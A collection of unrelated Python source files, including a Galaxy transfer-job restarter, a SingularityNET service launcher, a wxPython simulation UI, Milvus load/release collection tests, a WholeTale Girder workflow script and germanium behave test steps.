if type(error) != dict:
error = dict(code=256, message='Error connecting to transfer daemon', data=str(e))
rval.append(dict(transfer_job_id=tj.id, state=tj.state, error=error))
else:
self.sa_session.refresh(tj)
rval.append(dict(transfer_job_id=tj.id, state=tj.state))
for tj_state in rval:
if tj_state['state'] in self.app.model.TransferJob.terminal_states:
log.debug('Transfer job %s is in terminal state: %s' % (tj_state['transfer_job_id'], tj_state['state']))
elif tj_state['state'] == self.app.model.TransferJob.states.PROGRESS and 'percent' in tj_state:
log.debug('Transfer job %s is %s%% complete' % (tj_state['transfer_job_id'], tj_state['percent']))
if len(rval) == 1:
return rval[0]
return rval
def __restarter(self):
log.info('Transfer job restarter starting up...')
while self.running:
dead = []
self.sa_session.expunge_all() # our session is threadlocal so this is safe.
for tj in self.sa_session.query(self.app.model.TransferJob) \
.filter(self.app.model.TransferJob.state == self.app.model.TransferJob.states.RUNNING):
if not tj.pid:
continue
# This will only succeed if the process exists and is owned by the
# user running Galaxy (unless that user is root, in which case it
# can be owned by anyone - but you're not running Galaxy as root,
# right?). This is not guaranteed proof that the transfer is alive
# since another process may have assumed the original process' PID.
# But that will only cause the transfer to not restart until that
# process dies, which hopefully won't be too long from now... If
# it becomes a problem, try to talk to the socket a few times and
# restart the transfer if socket communication fails repeatedly.
try:
os.kill(tj.pid, 0)
except:
self.sa_session.refresh(tj)
if tj.state == tj.states.RUNNING:
log.error('Transfer job %s is marked as running but pid %s appears to be dead.' % (tj.id, tj.pid))
dead.append(tj)
if dead:
self.run(dead)
self.sleeper.sleep(30)
log.info('Transfer job restarter shutting down...')
def shutdown(self):
self.running = False
self.sleeper.wake()
|
run_object_detection_service.py
|
import pathlib
import subprocess
import time
import os
import sys
import logging
import threading
from service import registry
logging.basicConfig(level=10, format="%(asctime)s - [%(levelname)8s] - %(name)s - %(message)s")
log = logging.getLogger("run_object_detection")
def main():
root_path = pathlib.Path(__file__).absolute().parent
# All services modules go here
service_modules = ["service.object_detection_service"]
# Removing all previous snetd .db file
os.system("rm snetd*.db")
# Call for all the services listed in service_modules
start_all_services(root_path, service_modules)
# Infinite loop to serve the services
while True:
try:
time.sleep(1)
except Exception as e:
log.error(e)
exit(0)
def start_all_services(cwd, service_modules):
"""
Loop through all service_modules and start them.
For each one, an instance of Daemon "snetd" is created.
snetd will start with configs from "snetd.config.json"
"""
try:
for i, service_module in enumerate(service_modules):
service_name = service_module.split(".")[-1]
log.info("Launching {} on port {}".format(str(registry[service_name]), service_module))
process_th = threading.Thread(target=start_service, args=(cwd, service_module))
# Bind the thread with the main() to abort it when main() exits.
process_th.daemon = True
process_th.start()
except Exception as e:
log.error(e)
return False
return True
def start_service(cwd, service_module):
"""
Starts SNET Daemon ("snetd") and the python module of the service
at the passed gRPC port.
"""
start_snetd(str(cwd))
service_name = service_module.split(".")[-1]
grpc_port = registry[service_name]["grpc"]
subprocess.Popen(
[sys.executable, "-m", service_module, "--grpc-port", str(grpc_port)],
cwd=str(cwd))
def start_snetd(cwd):
"""
Starts the Daemon "snetd":
"""
cmd = ["snetd", "serve"]
subprocess.Popen(cmd, cwd=str(cwd))
return True
if __name__ == "__main__":
main()
|
AbstractUI.py
|
import wx
import multiprocessing as mp
import time
from . import process
import abc
#define an abstract UI class which contains code to interact with server.
#Note that each demo MUST derive its own subclass of this class (in *demo_name*_UI.py), and modify existing/add new methods to customise the GUI to the demo's needs.
class AbstractUI(wx.Frame):
#__metaclass__ = abc.ABCMeta
#@abc.abstractmethod
def __init__(self,parent,title,demo,servercomm):
wx.Frame.__init__(self,parent,title=title)
self.demo=demo
self.servercomm=servercomm
#bind closing the window to the OnClose() method (kills the process and deletes the simulation from the server)
self.Bind(wx.EVT_CLOSE,self.OnClose)
#timer which periodically checks from process to see if there is new data avaiable etc.
self.timer=wx.Timer(self)
self.Bind(wx.EVT_TIMER,self.TimerCallback,self.timer)
#default refreshrate to 0.5s (This may need to be updated on a per-demo basis)
self.refreshrate=0.5
#start the simulation
#@abc.abstractmethod
def StartSim(self,config):
self.servercomm.StartSim(config) #pass in config file
(self.pipemain,pipeprocess)=mp.Pipe() #create pipe for sending data between processes
self.frameno=mp.Value('i',0) #frameno is an integer, initialised to 0
self.nfiles=mp.Value('i',0) #number of files available on server
self.getdata=mp.Value('b',False) #flag to tell process to get new data
self.newdata=mp.Value('b',False) #flag saying if process has new data ready
self.finished=mp.Value('b',False) #flag to tell process that we are done
self.simfinished=mp.Value('b',False) #flag for process to tell ui that the simulation is finished
#kick off process
self.p=mp.Process(target=process.process,args=(self.frameno,self.nfiles,self.getdata,self.newdata,pipeprocess,self.demo,self.servercomm,self.finished,self.refreshrate,self.simfinished))
self.p.start() #start off process
self.CurrentFrame=0
#Start timer (argument to .Start is in milliseconds)
self.timer.Start(self.refreshrate*1000)
#stop the simulation
#@abc.abstractmethod
def StopSim(self):
print("Deleting Simulation")
self.p.terminate()
time.sleep(0.5)
self.servercomm.DeleteSim()
self.nfiles.value=0
self.CurrentFrame=0
self.timer.Stop()
#function that checks for new data from the process. If so, it downloads it and (if required) renders it
#@abc.abstractmethod
def TimerCallback(self,e):
if self.servercomm.IsStarted():
try:
self.GetLatestFrame
except:
self.GetLatestFrame=False
if self.newdata.value: #if new data is available
if self.getdata.value: #if we have requested new data
dto=self.pipemain.recv() #get the dto from process
self.CurrentFrame=self.frameno.value #set the current frame number to the one the process has just read in
if self.playing: #increment frame number by 1 and tell process to fetch it
if self.GetLatestFrame:
self.frameno.value=-1
else:
self.frameno.value += 1
self.getdata.value=True
else: #we don't need any more data
self.getdata.value=False
self.pipemain.send(1)#read receipt
self.demo.RenderFrame(self,dto) #render the data
else: #we didn't request new data (likely someone hit 'pause' after a request for new data was put into the process). We don't need/want this data, so read it into a dummy array then do nothing
dummydata=self.pipemain.recv() #read data into dummy array and do nothing
self.pipemain.send(1)
#Make sure any background processes are killed off when the main window is closed
#@abc.abstractmethod
def OnClose(self,evt):
print("Exiting Program...")
try:
self.p.terminate()
print("Terminating processes")
except:
print("no process to be terminated")
if self.servercomm.IsStarted():
print("Deleting simulation temp files")
self.servercomm.DeleteSim()
self.Destroy()
print("Done!")
|
test_load_collection.py
|
import pdb
import pytest
from utils import *
from constants import *
uid = "load_collection"
field_name = default_float_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": default_top_k, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
class TestLoadCollection:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_collection_after_index(self, connect, collection, get_simple_index):
'''
target: test load collection, after index created
method: insert and create index, load collection with correct params
expected: no error raised
'''
connect.insert(collection, default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.level(2)
def test_load_collection_after_index_binary(self, connect, binary_collection, get_binary_index):
'''
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
'''
ids = connect.insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
get_binary_index["metric_type"] = metric_type
connect.drop_index(binary_collection, default_binary_vec_field_name)
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, default_binary_vec_field_name)
assert index == get_binary_index
connect.load_collection(binary_collection)
connect.release_collection(binary_collection)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_empty_collection(self, connect, collection):
'''
target: test load collection
method: no entities in collection, load collection with correct params
expected: load success
'''
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.level(2)
def test_load_collection_dis_connect(self, dis_connect, collection):
'''
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.load_collection(collection)
@pytest.mark.level(2)
def test_release_collection_dis_connect(self, dis_connect, collection):
'''
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.release_collection(collection)
@pytest.mark.level(2)
def test_load_collection_not_existed(self, connect, collection):
collection_name = gen_unique_str(uid)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.level(2)
def test_release_collection_not_existed(self, connect, collection):
collection_name = gen_unique_str(uid)
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_collection_not_load(self, connect, collection):
"""
target: test release collection without load
method:
expected: raise exception
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_collection_after_load_release(self, connect, collection):
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_collection(collection)
connect.load_collection(collection)
def test_load_collection_repeatedly(self, connect, collection):
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.load_collection(collection)
@pytest.mark.level(2)
def test_load_release_collection(self, connect, collection):
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.insert(collection_name, default_entities)
connect.flush([collection_name])
connect.load_collection(collection_name)
connect.release_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_collection_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.drop_collection(collection)
try:
connect.release_collection(collection)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_collection_without_flush(self, connect, collection):
"""
target: test load collection without flush
method: insert entities without flush, then load collection
expected: load collection failed
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.load_collection(collection)
# TODO
def _test_load_collection_larger_than_memory(self):
"""
target: test load collection when memory less than collection size
method: i don't know
expected: raise exception
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_collection_release_part_partitions(self, connect, collection):
"""
target: test release part partitions after load collection
method: load collection and release part partitions
expected: released partitions search empty
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
connect.search(collection, default_single_query, partition_names=[default_tag])
res = connect.search(collection, default_single_query, partition_names=[default_partition_name])
assert len(res[0]) == default_top_k
def test_load_collection_release_all_partitions(self, connect, collection):
"""
target: test release all partitions after load collection
method: load collection and release all partitions
expected: search empty
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_partition_name, default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_partitions_release_collection(self, connect, collection):
"""
target: test release collection after load partitions
method: insert entities into partitions, search empty after load partitions and release collection
expected: search result empty
"""
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
# assert len(res[0]) == 0
class TestReleaseAdvanced:
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_collection_during_searching(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into collection, flush and load collection, release collection during searching
expected:
"""
nq = 1000
top_k = 1
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
query, _ = gen_query_vectors(field_name, default_entities, top_k, nq)
future = connect.search(collection, query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def test_release_partition_during_searching(self, connect, collection):
"""
target: test release partition during searching
method: insert entities into partition, flush and load partition, release partition during searching
expected:
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_query_vectors(field_name, default_entities, top_k, nq)
connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, _async=True)
connect.release_partitions(collection, [default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_collection_during_searching_A(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into partition, flush and load partition, release collection during searching
expected:
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_query_vectors(field_name, default_entities, top_k, nq)
connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def _test_release_collection_during_loading(self, connect, collection):
"""
target: test release collection during loading
method: insert entities into collection, flush, release collection during loading
expected:
"""
connect.insert(collection, default_entities)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def _test_release_partition_during_loading(self, connect, collection):
"""
target: test release partition during loading
method: insert entities into partition, flush, release partition during loading
expected:
"""
connect.create_partition(collection, default_tag)
connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_partitions(collection, [default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
def _test_release_collection_during_inserting(self, connect, collection):
"""
target: test release collection during inserting
method: load collection, do release collection during inserting
expected:
"""
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
def insert():
connect.insert(collection, default_entities)
t = threading.Thread(target=insert, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
res = connect.search(collection, default_single_query)
# assert len(res[0]) == 0
def _test_release_collection_during_indexing(self, connect, collection):
"""
target: test release collection during building index
method: insert and flush, load collection, do release collection during creating index
expected:
"""
pass
def _test_release_collection_during_droping_index(self, connect, collection):
"""
target: test release collection during droping index
method: insert, create index and flush, load collection, do release collection during droping index
expected:
"""
pass
class TestLoadCollectionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_load_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.load_collection(collection_name)
@pytest.mark.level(2)
def test_release_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.release_collection(collection_name)
class TestLoadPartition:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in cpu mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_partition_after_index(self, connect, collection, get_simple_index):
'''
target: test load collection, after index created
method: insert and create index, load collection with correct params
expected: no error raised
'''
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
search_param = get_search_param(get_simple_index["index_type"])
query, vecs = gen_query_vectors(field_name, default_entities, default_top_k, nq=1, search_params=search_param)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, partition_names=[default_tag])
assert len(res[0]) == default_top_k
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_partition_after_index_binary(self, connect, binary_collection, get_binary_index):
'''
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
'''
connect.create_partition(binary_collection, default_tag)
ids = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
logging.getLogger().info(metric_type)
get_binary_index["metric_type"] = metric_type
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
connect.load_partitions(binary_collection, [default_tag])
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_empty_partition(self, connect, collection):
'''
target: test load collection
method: no entities in collection, load collection with correct params
expected: load success
'''
connect.create_partition(collection, default_tag)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_load_collection_dis_connect(self, connect, dis_connect, collection):
'''
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
'''
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
dis_connect.load_partitions(collection, [default_tag])
@pytest.mark.level(2)
def test_release_partition_dis_connect(self, connect, dis_connect, collection):
'''
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
'''
connect.create_partition(collection, default_tag)
connect.load_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
dis_connect.release_partitions(collection, [default_tag])
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_partition_not_existed(self, connect, collection):
partition_name = gen_unique_str(uid)
try:
connect.load_partitions(collection, [partition_name])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % partition_name
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_partition_not_existed(self, connect, collection):
partition_name = gen_unique_str(uid)
try:
connect.release_partitions(collection, [partition_name])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % partition_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_partition_not_load(self, connect, collection):
"""
target: test release collection without load
method:
expected: raise exception
"""
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.release_partitions(collection, [default_tag])
@pytest.mark.level(2)
def test_load_release_after_drop(self, connect, collection):
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_partition_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_release_after_collection_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_collection(collection)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
class TestLoadPartitionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_partition_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_load_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
@pytest.mark.level(2)
def test_release_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
|
workflow.py
|
import datetime
import json
import os
import tempfile
import threading
import time
from hashlib import md5
from pathlib import Path
import sseclient
from girder_client import GirderClient
class InstanceStatus:
LAUNCHING = 0
RUNNING = 1
ERROR = 2
def md5sum(filename, buf_size=8192):
m = md5()
# the with statement makes sure the file will be closed
if filename.is_dir():
return
with open(filename, "rb") as f:
# We read the file in small chunk until EOF
data = f.read(buf_size)
while data:
# We had data to the md5 hash
m.update(data)
data = f.read(buf_size)
# We return the md5 hash in hex
return m.hexdigest()
def event_listener(gc):
stream = gc.sendRestRequest(
"GET",
"/notification/stream",
stream=True,
headers={"Accept": "text/event-stream"},
jsonResp=False,
parameters={"since": int(datetime.datetime.now().timestamp())},
)
client = sseclient.SSEClient(stream)
for event in client.events():
data = json.loads(event.data)
if data["type"] == "wt_progress":
progress = int(data["data"]["current"] / data["data"]["total"] * 100.0)
msg = (
" -> event received:"
f" msg = {data['data']['message']}"
f" status = {data['data']['state']}"
f" progress = {progress}%"
)
print(msg)
class Manuscript:
"""Pseudo core2 <-> WT interface.
We are going to map Manuscript to Tale and Submission to Version.
"""
def __init__(self, api_url="https://girder.stage.wholetale.org/api/v1"):
self.gc = GirderClient(apiUrl=api_url)
self.gc.authenticate(apiKey=os.environ.get("GIRDER_API_KEY"))
self.tale = self.create_tale()
self.sse_handler = threading.Thread(
target=event_listener, args=(self.gc,), daemon=False
)
self.sse_handler.start()
def default_image(self):
images = self.gc.get("/image", parameters={"text": "Jupyter"})
return images[0]
def create_tale(self, image=None):
if image is None:
image = self.default_image()
tale = self.gc.post("/tale", json={"imageId": image["_id"], "dataSet": []})
return tale
def create_submission(self, name=None, path=None):
"""
path needs to point to a directory with submission files
"""
# upload path
for fname in path.iterdir():
self.gc.uploadFileToFolder(self.tale["workspaceId"], fname)
# Finalize an immutable "submission"
parameters = {"taleId": self.tale["_id"]}
if name is not None:
parameters["name"] = name
version = self.gc.post("/version", parameters=parameters)
return version
def run(self, submissionId=None):
if submissionId is not None:
print("We would revert to that version. Pass now")
instance = self.gc.post("/instance", parameters={"taleId": self.tale["_id"]})
while instance["status"] == InstanceStatus.LAUNCHING:
time.sleep(2)
instance = self.gc.get(f"/instance/{instance['_id']}")
return instance
def stop(self, instance):
self.gc.delete(f"/instance/{instance['_id']}")
def download_submission(self, path, folder_id=None):
if folder_id is None:
folder_id = self.tale["workspaceId"] # otherwise it should be version
self.gc.downloadFolderRecursive(folder_id, path)
@staticmethod
def compare_submission(new, old):
new_files = set(_.name for _ in new.iterdir())
old_files = set(_.name for _ in old.iterdir())
if diff := new_files - old_files:
print(" New files:")
for name in diff:
print(f" -> {name}")
if diff := old_files - new_files:
print(" Removed files:")
for name in diff:
print(f" -> {name}")
for name in new_files & old_files:
new_sum = md5sum(new / name)
old_sum = md5sum(old / name)
if new_sum != old_sum:
print(f"File {name} was modified!!! (md5sum differs)")
print("[*] Creating a new Manuscript")
manuscript = Manuscript()
print("[*] Creating submission and uploading data")
path = Path(os.path.dirname(__file__)) / "example_submission"
manuscript.create_submission(name="Submission no. 1", path=path)
print("[*] Starting Jupyter notebook (this may take a while...)")
binder = manuscript.run()
print("----")
print(f" Open your browser and go to: {binder['url']}")
print(" Make sure to run 'run_me.ipynb'")
input(" After you're done with notebook press Enter to continue...")
manuscript.stop(binder)
with tempfile.TemporaryDirectory() as tmpdirname:
print("[*] Created temporary directory for submission", path)
manuscript.download_submission(tmpdirname)
print(
"[*] Comparing files pre/post execution "
"(ultimately can happen on the backend)"
)
manuscript.compare_submission(Path(tmpdirname), path)
print("[*] Cleaning up...")
print("Press CTRL-C to exit")
|
basic_germanim_test.py
|
from behave import *
from time import sleep
import os
import re
import threading
from germanium.static import *
from features.steps.asserts import *
use_step_matcher("re")
URL_MATCHER=re.compile(r"^(https?://)(.*?)(/.*)$")
def instantiate_germanium_webdriver():
browser = "firefox"
if 'TEST_BROWSER' in os.environ:
browser = os.environ['TEST_BROWSER']
def iframe_selector(germanium, iframe_name):
if iframe_name == 'iframe':
iframe = germanium.S('iframe').element()
germanium.switch_to_frame(iframe)
else:
germanium.switch_to_default_content()
open_browser(browser,
iframe_selector=iframe_selector)
@step("I open the browser")
def open_browser_step(context):
"""
:param context:
:return: void
"""
if not get_germanium():
instantiate_germanium_webdriver()
@step("I go to '(?P<page>.*?)'")
@step("I navigate to '(?P<page>.*?)'")
def navigate_to_page(context, page):
"""
Navigate to the given URL.
:param context:
:param page:
:return:
"""
if 'TEST_HOST' in os.environ:
page_matcher = URL_MATCHER.match(page)
page = page_matcher.group(1) + \
os.environ['TEST_HOST'] + \
page_matcher.group(3)
go_to(page)
@step(u'I type \'(?P<keys>.*?)\' into (?P<selector>.*)')
def type_keys_with_selector(context, keys, selector):
type_keys(keys, selector)
@step(u'the value for the (?P<selector>.*) is \'(?P<value>.*?)\'')
def step_impl(context, selector, value):
element = S(selector).element()
assert_equals(value, get_value(element))
@step("the title of the page equals '(?P<what>.*?)'")
def check_title_page(context, what):
assert_equals(what, get_germanium().title)
@step(u'I type_keys \'(?P<what>.*?)\'')
def type_keys_impl(context, what):
type_keys(what)
@step(u"in the selector (.*?) I type_keys '(.*?)'")
def type_keys_impl(context, selector, keys):
type_keys(keys, selector)
@step(u"in the locator (.*?) I type_keys '(.*?)'")
def type_keys_impl(context, selector, keys):
type_keys(keys, S(selector))
@step(u"in the locator (.*?) I type_keys '(.*?)' with 200ms delay")
def type_keys_impl(context, selector, keys):
type_keys(keys, S(selector), delay=0.2)
@step(u"I click on '(.*)'")
def step_impl(context, selector):
click(selector)
@step(u'the text of the page is')
def step_impl(context):
assert_equals(context.text, Element('body').element().text)
@step(u"the text of the page contains '(.*?)'")
def step_impl(context, text):
assert_true(text in Element('body').text())
@step(u"the text of the page doesn't contain '(.*?)'")
def step_impl(context, text):
assert_true(text not in Element('body').text())
@step(u'I wait forever')
def step_impl(context):
sleep(10000000)
@step(u'the I can read from a different thread the title of the page as \'(.*?)\'')
def step_impl(context, title):
def check_title():
assert_equals(title, get_germanium().title)
t = threading.Thread(target=check_title)
t.start()
t.join()
|
loop.py
|
import obspython as _obs
import threading
import traceback
from . import data as _data
from . import _helper
class Future:
_NOTSET = object()
_EXCEPTION = object()
_INTERRUPT = object()
_WAITING = []
def __init__(self):
self._result = self._NOTSET
self._exception = None
self._lock = {}
def has_result(self):
return self._result is not self._NOTSET
def result(self, timeout=-1):
r = self._result
if r is not self._NOTSET:
if r is self._EXCEPTION:
